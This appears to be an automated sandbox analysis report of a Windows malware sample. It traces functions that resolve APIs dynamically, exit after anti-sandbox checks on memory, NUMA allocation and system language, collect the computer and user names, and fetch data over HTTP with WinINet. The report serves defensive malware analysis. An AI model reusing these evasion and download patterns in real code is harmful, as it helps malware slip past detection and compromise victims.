                                • GetProcAddress.KERNEL32(75690000,016B56A8), ref: 00E66699
                                • GetProcAddress.KERNEL32(776F0000,016C8AB8), ref: 00E666B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00E666CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 00E666C1
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 029c898e2efa4b3da8f1538b01074edb55d2589cb7a0643d4c920768e13d63eb
                                • Instruction ID: 85c7951f497087d4faa6bb763d74160551ccd869d90700ffbc508672326cbf0c
                                • Opcode Fuzzy Hash: 029c898e2efa4b3da8f1538b01074edb55d2589cb7a0643d4c920768e13d63eb
                                • Instruction Fuzzy Hash: 2AA153B5E612049FD775DF64E44CA2A37B9F788768310891AF995E3348D73EA800DFA0
                                Function 00E61BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2141 e61bf0-e61c0b call e42a90 call e66390 2146 e61c0d 2141->2146 2147 e61c1a-e61c27 call e42930 2141->2147 2148 e61c10-e61c18 2146->2148 2151 e61c35-e61c63 2147->2151 2152 e61c29-e61c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 e61c65-e61c67 ExitProcess 2151->2156 2157 e61c6d-e61c7b GetSystemInfo 2151->2157 2152->2151 2158 e61c85-e61ca0 call e41030 call e410c0 GetUserDefaultLangID 2157->2158 2159 e61c7d-e61c7f ExitProcess 2157->2159 2164 e61ca2-e61ca9 2158->2164 2165 e61cb8-e61cca call e62ad0 call e63e10 2158->2165 2164->2165 2166 e61cb0-e61cb2 ExitProcess 2164->2166 2171 e61ce7-e61d06 lstrlen call e42930 2165->2171 2172 e61ccc-e61cde call e62a40 call e63e10 2165->2172 2178 e61d23-e61d40 lstrlen call e42930 2171->2178 2179 e61d08-e61d0d 2171->2179 2172->2171 2183 e61ce0-e61ce1 ExitProcess 2172->2183 2186 e61d42-e61d44 2178->2186 2187 e61d5a-e61d7b call e62ad0 lstrlen call e42930 2178->2187 2179->2178 2181 e61d0f-e61d11 2179->2181 2181->2178 2184 e61d13-e61d1d lstrcpy lstrcat 2181->2184 2184->2178 2186->2187 2189 e61d46-e61d54 lstrcpy lstrcat 2186->2189 2193 e61d7d-e61d7f 2187->2193 2194 e61d9a-e61db4 lstrlen call e42930 2187->2194 2189->2187 2193->2194 2195 e61d81-e61d85 2193->2195 2199 e61db6-e61db8 2194->2199 2200 e61dce-e61deb call e62a40 lstrlen call e42930 2194->2200 2195->2194 2197 e61d87-e61d94 lstrcpy lstrcat 2195->2197 2197->2194 2199->2200 2201 e61dba-e61dc8 lstrcpy lstrcat 2199->2201 2206 e61ded-e61def 2200->2206 2207 e61e0a-e61e0f 2200->2207 2201->2200 2206->2207 2208 e61df1-e61df5 2206->2208 2209 e61e16-e61e22 call e42930 2207->2209 2210 e61e11 call e42a20 2207->2210 2208->2207 2211 e61df7-e61e04 lstrcpy lstrcat 2208->2211 2215 e61e24-e61e26 2209->2215 2216 e61e30-e61e66 call e42a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 e61e28-e61e2a lstrcpy 2215->2217 2228 e61e8c-e61ea0 CreateEventA call e61b20 call e5ffd0 2216->2228 2229 e61e68-e61e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 e61ea5-e61eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                APIs
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C15E8), ref: 00E663E9
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1600), ref: 00E66402
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1768), ref: 00E6641A
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1720), ref: 00E66432
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C8B08), ref: 00E6644B
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016B53A8), ref: 00E66463
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016B54A8), ref: 00E6647B
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1618), ref: 00E66494
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1738), ref: 00E664AC
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C16A8), ref: 00E664C4
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C1690), ref: 00E664DD
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016B5688), ref: 00E664F5
                                  • Part of subcall function 00E66390: GetProcAddress.KERNEL32(77190000,016C16C0), ref: 00E6650D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E61C2F
                                • ExitProcess.KERNEL32 ref: 00E61C67
                                • GetSystemInfo.KERNEL32(?), ref: 00E61C71
                                • ExitProcess.KERNEL32 ref: 00E61C7F
                                  • Part of subcall function 00E41030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E41046
                                  • Part of subcall function 00E41030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E4104D
                                  • Part of subcall function 00E41030: ExitProcess.KERNEL32 ref: 00E41058
                                  • Part of subcall function 00E410C0: GlobalMemoryStatusEx.KERNEL32 ref: 00E410EA
                                  • Part of subcall function 00E410C0: ExitProcess.KERNEL32 ref: 00E41114
                                • GetUserDefaultLangID.KERNEL32 ref: 00E61C8F
                                • ExitProcess.KERNEL32 ref: 00E61CB2
                                • ExitProcess.KERNEL32 ref: 00E61CE1
                                • lstrlen.KERNEL32(016C8AE8), ref: 00E61CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E61D15
                                • lstrcat.KERNEL32(00000000,016C8AE8), ref: 00E61D1D
                                • lstrlen.KERNEL32(00E74B98), ref: 00E61D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61D48
                                • lstrcat.KERNEL32(00000000,00E74B98), ref: 00E61D54
                                • lstrlen.KERNEL32(00000000), ref: 00E61D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61D94
                                • lstrlen.KERNEL32(00E74B98), ref: 00E61D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61DBC
                                • lstrcat.KERNEL32(00000000,00E74B98), ref: 00E61DC8
                                • lstrlen.KERNEL32(00000000), ref: 00E61DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E61DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E61E04
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 49a9ab31085c1ca3df59a57f9bb18360b6f30be947cff30cbd481e7e852e913b
                                • Instruction ID: 8da85cdcf622e4c1f2b77662d9a179550a0c47c91ef6d691f974c275301b2c3d
                                • Opcode Fuzzy Hash: 49a9ab31085c1ca3df59a57f9bb18360b6f30be947cff30cbd481e7e852e913b
                                • Instruction Fuzzy Hash: 3171D731990205AFC732AFB0FC4DB6E76B9AF44795F089068FA46B6145DB75DC01CB60
                                Function 00E46C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2234 e46c40-e46c64 call e42930 2237 e46c75-e46c97 call e44bc0 2234->2237 2238 e46c66-e46c6b 2234->2238 2242 e46c99 2237->2242 2243 e46caa-e46cba call e42930 2237->2243 2238->2237 2239 e46c6d-e46c6f lstrcpy 2238->2239 2239->2237 2244 e46ca0-e46ca8 2242->2244 2247 e46cbc-e46cc2 lstrcpy 2243->2247 2248 e46cc8-e46cf5 InternetOpenA StrCmpCA 2243->2248 2244->2243 2244->2244 2247->2248 2249 e46cf7 2248->2249 2250 e46cfa-e46cfc 2248->2250 2249->2250 2251 e46d02-e46d22 InternetConnectA 2250->2251 2252 e46ea8-e46ebb call e42930 2250->2252 2253 e46ea1-e46ea2 InternetCloseHandle 2251->2253 2254 e46d28-e46d5d HttpOpenRequestA 2251->2254 2261 e46ebd-e46ebf 2252->2261 2262 e46ec9-e46ee0 call e42a20 * 2 2252->2262 2253->2252 2256 e46e94-e46e9e InternetCloseHandle 2254->2256 2257 e46d63-e46d65 2254->2257 2256->2253 2259 e46d67-e46d77 InternetSetOptionA 2257->2259 2260 e46d7d-e46dad HttpSendRequestA HttpQueryInfoA 2257->2260 2259->2260 2263 e46dd4-e46de4 call e63d90 2260->2263 2264 e46daf-e46dd3 call e671e0 call e42a20 * 2 2260->2264 2261->2262 2265 e46ec1-e46ec3 lstrcpy 2261->2265 2263->2264 2275 e46de6-e46de8 2263->2275 2265->2262 2276 e46e8d-e46e8e InternetCloseHandle 2275->2276 2277 e46dee-e46e07 InternetReadFile 2275->2277 2276->2256 2277->2276 2279 e46e0d 2277->2279 2281 e46e10-e46e15 2279->2281 2281->2276 2283 e46e17-e46e3d call e67310 2281->2283 2286 e46e44-e46e51 call e42930 2283->2286 2287 e46e3f call e42a20 2283->2287 2291 e46e61-e46e8b call e42a20 InternetReadFile 2286->2291 2292 e46e53-e46e57 2286->2292 2287->2286 2291->2276 2291->2281 2292->2291 2293 e46e59-e46e5b lstrcpy 2292->2293 2293->2291
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E46C6F
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E46CC2
                                • InternetOpenA.WININET(00E6CFEC,00000001,00000000,00000000,00000000), ref: 00E46CD5
                                • StrCmpCA.SHLWAPI(?,016CF2C8), ref: 00E46CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,016CEDE0,00000000,00000000,-00400100,00000000), ref: 00E46D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00E46D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00E46DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E46DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E46E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00E46E7D
                                • InternetCloseHandle.WININET(00000000), ref: 00E46E8E
                                • InternetCloseHandle.WININET(?), ref: 00E46E98
                                • InternetCloseHandle.WININET(00000000), ref: 00E46EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: 47055ef745f8d7910f4d73d9d14993f069a1d0a601adcc6dccca237e6ec120c9
                                • Instruction ID: d9c3607699f58560e15e9e87bb5226531d68cc9b667bf3356ebe5bae6e14f407
                                • Opcode Fuzzy Hash: 47055ef745f8d7910f4d73d9d14993f069a1d0a601adcc6dccca237e6ec120c9
                                • Instruction Fuzzy Hash: DD819071E50215ABEB20DFA4EC49FAEB7F8AF44714F145029FA45F7280DB74AE048B91
                                Function 00E44A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2850 e44a60-e44afc RtlAllocateHeap 2867 e44afe-e44b03 2850->2867 2868 e44b7a-e44bbe VirtualProtect 2850->2868 2869 e44b06-e44b78 2867->2869 2869->2868
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E44AA2
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00E44BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 1115c04d1c9ab17c8ddf231512557a5633ad6528c54d57e3a452dea0e74ea7b6
                                • Instruction ID: 6dfa7a460b4cc6e144ee2e7560bae80f2fb313557e42b9a33c39c517eebac93f
                                • Opcode Fuzzy Hash: 1115c04d1c9ab17c8ddf231512557a5633ad6528c54d57e3a452dea0e74ea7b6
                                • Instruction Fuzzy Hash: 2131C39AB803BF768620EBEF4C4BB5FAE55DFC5760B02E056760C771C18BA15500CAA2
                                Function 00E62AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2957 e62ad0-e62b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 e62b44-e62b59 2957->2958 2959 e62b24-e62b36 2957->2959
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E62AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E62B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00E62B1A
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 36dfb3273fc5cc9f46dbc4687c7caae7d34c15f62a93e0a0f93b31d9fb85f711
                                • Instruction ID: 2cfc8cb1a9bff45802d95da9c74710ee940cce1c22ac5ec73152cef5a93110c0
                                • Opcode Fuzzy Hash: 36dfb3273fc5cc9f46dbc4687c7caae7d34c15f62a93e0a0f93b31d9fb85f711
                                • Instruction Fuzzy Hash: 13018F72E44608ABD710CF99E945B99F7A8F744B65F00026AF919E2780D779190087A1
                                Function 00E62A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E62A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E62A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00E62A8A
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: ee7f1866a062e9645d59edfb7ca71bfdc6ec8e68214fef41fdddcb62dd14bb1a
                                • Instruction ID: 3362636aeac12cf48e9e08299a9afd4d7925b4bbb0c077788a9ae9db1d3a0664
                                • Opcode Fuzzy Hash: ee7f1866a062e9645d59edfb7ca71bfdc6ec8e68214fef41fdddcb62dd14bb1a
                                • Instruction Fuzzy Hash: 35F090B1E40204AFC710DB88DD49F9EBBBCF704B21F000226FA15E2280D37919048BE1
                                Function 00E666E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 e666e0-e666e7 634 e66afe-e66b92 LoadLibraryA * 8 633->634 635 e666ed-e66af9 GetProcAddress * 43 633->635 636 e66b94-e66c03 GetProcAddress * 5 634->636 637 e66c08-e66c0f 634->637 635->634 636->637 638 e66c15-e66ccd GetProcAddress * 8 637->638 639 e66cd2-e66cd9 637->639 638->639 640 e66d4f-e66d56 639->640 641 e66cdb-e66d4a GetProcAddress * 5 639->641 642 e66d5c-e66de4 GetProcAddress * 6 640->642 643 e66de9-e66df0 640->643 641->640 642->643 644 e66df6-e66f0b GetProcAddress * 12 643->644 645 e66f10-e66f17 643->645 644->645 646 e66f8d-e66f94 645->646 647 e66f19-e66f88 GetProcAddress * 5 645->647 648 e66f96-e66fbc GetProcAddress * 2 646->648 649 e66fc1-e66fc8 646->649 647->646 648->649 650 e66ff5-e66ffc 649->650 651 e66fca-e66ff0 GetProcAddress * 2 649->651 652 e67002-e670e8 GetProcAddress * 10 650->652 653 e670ed-e670f4 650->653 651->650 652->653 654 e670f6-e6714d GetProcAddress * 4 653->654 655 e67152-e67159 653->655 654->655 656 e6716e-e67175 655->656 657 e6715b-e67169 GetProcAddress 655->657 658 e67177-e671ce GetProcAddress * 4 656->658 659 e671d3 656->659 657->656 658->659
                                APIs
                                • GetProcAddress.KERNEL32(77190000,016B5668), ref: 00E666F5
                                • GetProcAddress.KERNEL32(77190000,016B5548), ref: 00E6670D
                                • GetProcAddress.KERNEL32(77190000,016C8D08), ref: 00E66726
                                • GetProcAddress.KERNEL32(77190000,016C8D50), ref: 00E6673E
                                • GetProcAddress.KERNEL32(77190000,016C8F48), ref: 00E66756
                                • GetProcAddress.KERNEL32(77190000,016CD220), ref: 00E6676F
                                • GetProcAddress.KERNEL32(77190000,016BA848), ref: 00E66787
                                • GetProcAddress.KERNEL32(77190000,016CD190), ref: 00E6679F
                                • GetProcAddress.KERNEL32(77190000,016CD148), ref: 00E667B8
                                • GetProcAddress.KERNEL32(77190000,016CD3E8), ref: 00E667D0
                                • GetProcAddress.KERNEL32(77190000,016CD208), ref: 00E667E8
                                • GetProcAddress.KERNEL32(77190000,016B5448), ref: 00E66801
                                • GetProcAddress.KERNEL32(77190000,016B5708), ref: 00E66819
                                • GetProcAddress.KERNEL32(77190000,016B53E8), ref: 00E66831
                                • GetProcAddress.KERNEL32(77190000,016B5568), ref: 00E6684A
                                • GetProcAddress.KERNEL32(77190000,016CD298), ref: 00E66862
                                • GetProcAddress.KERNEL32(77190000,016CD1A8), ref: 00E6687A
                                • GetProcAddress.KERNEL32(77190000,016BA758), ref: 00E66893
                                • GetProcAddress.KERNEL32(77190000,016B5408), ref: 00E668AB
